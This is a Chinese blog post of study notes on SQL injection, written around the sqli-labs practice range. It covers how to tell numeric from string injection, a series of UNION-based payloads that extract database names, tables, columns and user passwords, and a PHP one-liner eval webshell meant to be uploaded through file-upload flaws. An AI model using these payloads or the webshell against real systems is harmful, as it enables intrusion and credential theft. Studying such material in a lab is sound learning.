<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->
    
        <meta name="description" content="sqli-labs靶场及相关知识
sql的相关知识一、什么是sql是一种用于管理关系数据库，并与数据库中的数据进行通讯的计算机语言二、什么是sql注入在我们的应用系统使用sql语句进行管理数据库时，往往采用拼接的方式形成一条完整的数据库语言，而危险的是，在拼接sql语句的时候，我们可以改变sql语句">
    

    <!--Author-->
    
        <meta name="author" content="John Doe">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="sql相关知识"/>
    

    <!--Open Graph Description-->
    

    <!--Open Graph Site Name-->
    <meta property="og:site_name" content="Hexo"/>

    <!--Type page-->
    
        <meta property="og:type" content="article" />
    

    <!--Page Cover-->
    

    
        <meta name="twitter:card" content="summary" />
    
    
    

    <!-- Title -->
    
    <title>sql相关知识 - Hexo</title>

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.2/css/bootstrap.min.css" integrity="sha384-y3tfxAZXuh4HwSYylfB+J125MxIs6mR5FOHamPBG064zB+AFeWH94NdvaCBm8qnd" crossorigin="anonymous">

    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet" />

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/style.css">


    <!-- Google Analytics -->
    


<meta name="generator" content="Hexo 5.4.0"></head>


<body>

<div class="bg-gradient"></div>
<div class="bg-pattern"></div>

<!-- Menu -->
<!--Menu Links and Overlay-->
<div class="menu-bg">
    <div class="menu-container">
        <ul>
            
            <li class="menu-item">
                <a href="/">
                    Home
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/archives">
                    Archives
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/about.html">
                    About
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/tags">
                    Tags
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/categories">
                    Categories
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/contact.html">
                    Contact
                </a>
            </li>
            
        </ul>
    </div>
</div>

<!--Hamburger Icon-->
<nav>
    <a href="#menu"></a>
</nav>

<div class="container">

    <!-- Main Content -->
    <div class="row">
    <div class="col-sm-12">

        <!--Title and Logo-->
        <header>
    <div class="logo">
        <a href="/"><i class="logo-icon fa fa-cube" aria-hidden="true"></i></a>
        
    </div>
</header>

        <section class="main">
            
<div class="post">

    <div class="post-header">
        <h1 class="title">
            <a href="/2021/05/19/sql-labs/">
                sql相关知识
            </a>
        </h1>
        <div class="post-info">
            
                <span class="date">2021-05-19</span>
            
            
            
        </div>
    </div>

    <div class="content">

        <!-- Gallery -->
        

        <!-- Post Content -->
        <h2 id="sqli-labs靶场及相关知识"><a href="#sqli-labs靶场及相关知识" class="headerlink" title="sqli-labs靶场及相关知识"></a>sqli-labs靶场及相关知识</h2><p><img src="https://img-blog.csdnimg.cn/20210203100511759.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MzU0OTQyNQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h2 id="sql的相关知识"><a href="#sql的相关知识" class="headerlink" title="sql的相关知识"></a>sql的相关知识</h2><p>一、什么是sql<br>是一种用于管理关系数据库，并与数据库中的数据进行通讯的计算机语言<br>二、什么是sql注入<br>在我们的应用系统使用sql语句进行管理数据库时，往往采用拼接的方式形成一条完整的数据库语言，而危险的是，在拼接sql语句的时候，<strong>我们可以改变sql语句。从而让数据执行我们想要执行的语句</strong>，这就是我们常说的sql注入<br>三、sql注入的分类<br><img src="https://img-blog.csdnimg.cn/20210211110650990.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MzU0OTQyNQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">四、数字型与字符型<br>1、数字型判断：<br>当输入的参 x 为整型时，通常 abc.php 中 Sql 语句类型大致如下：<br> <code>select * from &lt;表名&gt; where id = x</code><br>  这种类型可以使用经典的 and 1=1 和 and 1=2 来判断<br>        Url 地址中输入 <a target="_blank" rel="noopener" href="http://xxx/abc.php?id=">http://xxx/abc.php?id=</a> x and 1=1 页面依旧运行正常，继续进行下一步。<br>        Url 地址中继续输入 <a target="_blank" rel="noopener" href="http://xxx/abc.php?id=">http://xxx/abc.php?id=</a> x and 1=2 页面运行错误，则说明此 Sql 注入为数字型注入。<br>2、当输入的参 x 为字符型时，通常 abc.php 中 SQL 语句类型大致如下：<br><code>select * from &lt;表名&gt; where id = &#39;x&#39;</code><br>这种类型我们同样可以使用 and ‘1’=’1 和 and ‘1’=’2来判断：<br>        Url 地址中输入 <a target="_blank" rel="noopener" href="http://xxx/abc.php?id=">http://xxx/abc.php?id=</a> x’ and ‘1’=’1 页面运行正常，继续进行下一步。<br>        Url 地址中继续输入 <a target="_blank" rel="noopener" href="http://xxx/abc.php?id=">http://xxx/abc.php?id=</a> x’ and ‘1’=’2 页面运行错误，则说明此 Sql 注入为字符型注入。<br> <strong>注意：1、字符型会自动加入两个单引号。<br>      2、数字型不会加入两个单引号。<br>     3、被单引号括起来的数据会被当成一个整体。<br>     4、LIMIT m,n 会影响select语句的结果。<br>     5、页面回显发生错误和页面不回显数据是两回事。前者表示sql语句出错了，后者表示sql语句没有错误，但是条件不成立。</strong></p>
<h2 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h2><p>一、mysql相关指令</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">查库：select schema_name <span class="keyword">from</span> information_schema.schemata</span><br><span class="line">查表：select table_name <span class="keyword">from</span> information_schema.tables where table_schema=‘security’</span><br><span class="line">查列：select column_name <span class="keyword">from</span> information_schema.columns where table_name=‘users’</span><br><span class="line">查字段：select username,password <span class="keyword">from</span> security.users</span><br></pre></td></tr></table></figure>
<p>关于mysql的相关知识可查询<a target="_blank" rel="noopener" href="https://editor.csdn.net/md/?articleId=113677723">mysql相关知识</a><br>二、系统函数<br>1、<code>version()</code>–mysql版本<br><img src="https://img-blog.csdnimg.cn/20210210183931359.png" alt="在这里插入图片描述"><br>2、<code>user()</code>–数据库用户名</p>
<p><img src="https://img-blog.csdnimg.cn/20210210205741274.png" alt="在这里插入图片描述"><br>3、<code>database()</code>–数据库名<br><img src="https://img-blog.csdnimg.cn/20210211211456802.png" alt="在这里插入图片描述"><br>4、<code>@@datadir</code>–数据库路径<br><img src="https://img-blog.csdnimg.cn/20210211211814439.png" alt="在这里插入图片描述"><br>5、<code>concat()</code>–连接函数</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">concat(str1,str2,...)</span><br><span class="line">--没有分隔符地连接字符串</span><br><span class="line">--返回结果为连接参数产生的字符串</span><br><span class="line">--如有任何一个参数为NULL, 则返回值为 NULL</span><br><span class="line">--可以有一个或多个参数</span><br></pre></td></tr></table></figure>
<p>6、<code>concat_ws()</code></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">concat_ws(separator,str1,str2,...)</span><br><span class="line">--含有分隔符地连接字符串, 分隔符的位置会放在要连接的两个字符串之间</span><br><span class="line">--Separator为字符之间的分隔符, 可以是一个字符串, 也可以是其它参数</span><br><span class="line">--如果分隔符为 NULL, 则结果为 NULL</span><br><span class="line">--函数会忽略任何分隔符参数后的 NULL 值</span><br></pre></td></tr></table></figure>
<h2 id="sql-labs-master靶场"><a href="#sql-labs-master靶场" class="headerlink" title="sql-labs master靶场"></a>sql-labs master靶场</h2><p>一、注入流程：<br><img src="https://img-blog.csdnimg.cn/20210214100858566.png" alt="在这里插入图片描述"><br><strong>我们的数据库存储的数据按照上图的形式，一个数据库当中有很多的数据表，数据表当中有很多的列，每一列当中存储着数据。我们注入的过程就是先拿到数据库名，在获取到当前数据库名下的数据表，再获取当前数据表下的列，最后获取数据</strong><br>二、靶场部分解题步骤：<br>1、判断有无注入<br>2、判断是什么注入<br>3、①less1 id=1’；less2 id=1；less3 id=1’)；less4 id=1”)<br>②查看有多少列：order by 3–+<br>③查看哪些数据可以回显：union select 1,2,3–+<br>④查看当前数据库：union select 1,2,database()–+<br>⑤查看数据库security：union select 1,2,group_concat(schema_name)from information_schema.schemata–+<br>⑥查表：union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=‘security’–+<br>⑦查询列信息：union select 1,2,group_concat(column_name)from information_schema.columns where table_schema=‘security’–+<br>⑧查询账号和密码：union select 1,2,group_concat(concat_ws(’~’,username,password)) from security.users–+<br>4、一句话木马（webshell)<br>①举例：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php @<span class="built_in">eval</span>($_POST[<span class="string">&#x27;attack&#x27;</span>]) ?&gt;</span><br></pre></td></tr></table></figure>
<p>利用文件上传漏洞，往目标网站中上传一句话木马，然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误，也不报错。eval（）函数表示括号内的语句字符串什么的全都当做代码执行。$_POST[‘attack’]表示从页面中获得attack这个参数值<br>②一句话木马需要蚁剑，可查看博客<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_36235492/article/details/85713821?utm_source=app&app_version=4.5.2">中国蚁剑安装教程</a><br>③特点：一句话木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。<br>三、sql-labs 靶场注入分类<br>1、基于从服务器接收到的响应<br>&lt;1&gt;基于错误的 SQL 注入<br>原理：注入攻击的原理在于，程序命令和用户数据之前没有进行校验，使得攻击者有机会将程序命令当做用户输入的数据交给web程序，为所欲为。<br><strong>也就是说:接受相关参数未经处理直接带入数据库查询操作</strong><br>&lt;2&gt;联合查询的类型<br>UNION运算符可以bai将两个或两个以上上SELECT语句的查询结果集合合并成一个结果集合显示，即执行联合查询<br>&lt;3&gt;堆查询注射(堆叠注入)<br>原理：在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。<br><strong>也就是说：将语句堆叠在一起进行查询</strong><br>&lt;4&gt;SQL 盲注<br>1、原理：指的是在不知道数据库返回值的情况下对数据中的内容进行猜测，实施SQL注入，是一种猜测性质的注入<br>2、分类<br>①基于布尔SQL盲注<br>②基于时间的 SQL 盲注<br>③基于报错的 SQL 盲注<br>&lt;5&gt;基于如何处理输入的 SQL 查询（数据类型）<br>①基于字符串<br>②数字或整数为基础的</p>

    </div>

    

    

    <!-- Comments -->
    

</div>
        </section>

    </div>
</div>


</div>

<!-- Footer -->
<div class="push"></div>

<footer class="footer-content">
    <div class="container">
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6 footer-about">
                <h2>About</h2>
                <p>
                    This theme was developed by <a target="_blank" rel="noopener" href="https://github.com/klugjo">Jonathan Klughertz</a>. The source code is available on Github. Create Websites. Make Magic.
                </p>
            </div>
            
    <div class="col-xs-6 col-sm-6 col-md-3 col-lg-3 recent-posts">
        <h2>Recent Posts</h2>
        <ul>
            
            <li>
                <a class="footer-post" href="/2021/08/08/PHP%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95/">PHP魔术方法</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2021/08/08/PHP%E4%B8%8D%E6%AD%BB%E9%A9%AC/">PHP不死马</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2021/08/08/buuctf_php/">buuctf_php</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2021/08/01/%E8%AE%A1%E7%BD%91%E7%BD%91%E7%BB%9C%E7%AF%87/">计网网络篇</a>
            </li>
            
        </ul>
    </div>



            
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <ul class="list-inline footer-social-icons">
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://github.com/klugjo/hexo-theme-alpha-dust">
                            <span class="footer-icon-container">
                                <i class="fa fa-github"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://twitter.com/?lang=en">
                            <span class="footer-icon-container">
                                <i class="fa fa-twitter"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.facebook.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-facebook"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.instagram.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-instagram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://dribbble.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-dribbble"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://telegram.org/">
                            <span class="footer-icon-container">
                                <i class="fa fa-telegram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.behance.net/">
                            <span class="footer-icon-container">
                                <i class="fa fa-behance"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://500px.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-500px"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="mailto:test@example.com">
                            <span class="footer-icon-container">
                                <i class="fa fa-envelope-o"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="\#">
                            <span class="footer-icon-container">
                                <i class="fa fa-rss"></i>
                            </span>
                        </a>
                    </li>
                    
                </ul>
            </div>
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <div class="footer-copyright">
                    @Untitled. All right reserved | Design & Hexo <a target="_blank" rel="noopener" href="http://www.codeblocq.com/">Jonathan Klughertz</a>
                </div>
            </div>
        </div>
    </div>
</footer>

<!-- After footer scripts -->

<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Tween Max -->
<script src="//cdnjs.cloudflare.com/ajax/libs/gsap/1.18.5/TweenMax.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Custom JavaScript -->

<script src="/js/main.js"></script>


<!-- Disqus Comments -->



</body>

</html>